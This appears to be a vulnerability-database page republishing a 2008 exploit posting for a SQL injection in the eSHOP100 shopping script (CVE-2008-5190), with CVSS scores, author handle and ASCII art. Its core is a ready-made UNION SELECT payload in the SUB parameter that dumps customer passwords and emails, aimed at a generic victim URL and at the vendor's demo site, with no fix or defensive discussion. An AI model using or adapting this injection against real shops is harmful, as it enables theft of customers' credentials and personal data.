eSHOP100 (SUB) Remote SQL Injection Vulnerability

2008.11.23

Credit: JuDge

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-5190

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

             ########################################################################
             #                                                                      #
             #    ...:::::eSHOP100 SQL Injection Vulnerbility ::::....        #         
             ########################################################################


     ## AUTHOR : JuDge
                           
   ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
                          
  ## Script WebSite:http://www.eshop100.co.uk

 ##Dork::)

##DescRipTiON: pull customers info from database
   
##EXPLOITS:
                 www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
            

            ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

=================================================================================================================================o======
## thx to : All My FrienDs
                                   
                              i'm Not a HaCker
-   ) \         $$$$$$$$$$$$####.     $$$$$$###"             "###$$$$$$$$$   s'
-  (   )        $$$$$$$$$$$$$####.   $$$$$###"                ####$$$$$$$$s$$' )
-   ((          $$$$$$$$$$$#####       $$$$$$$$###"       "####$$$$$$$$$$
-   ) \         $$$$$$$$$$$$####.     $$$$$$###"             "###$$$$$$$$$   s'
-  (   )        $$$$$$$$$$$$$####.   $$$$$###"                ####$$$$$$$$s$$'
-  )  ( (       $$"$$$$$$$$$$$#####.$$$$$###'  JuDge Da  .###$$$$$$$$$$"
-  (  )  )   _,$"   $$$$$$$$$$$$######.$$##'     BeST     .###$$$$$$$$$$
-  ) (  ( \.         "$$$$$$$$$$$$$#######,,,.          ..####$$$$$$$$$$$"
- (   )$ )  )        ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$"
- (   ($$  ( \     _sS"  `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$,
-  )  )$$$s ) )  .      .   `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"'  `$$
-   (   $$$Ss/  .$,    .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S""        '
-     \)_$$$$$$$$$$$$$$$$$$$$$$$##"  $$        `$$.        `$$.
-         `"S$$$$$$$$$$$$$$$$$#"      $          `$          `$
-             `"""""""""""""'         '           '           '

References:

http://www.milw0rm.com/exploits/5970

http://secunia.com/advisories/30712

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

eSHOP100 (SUB) Remote SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.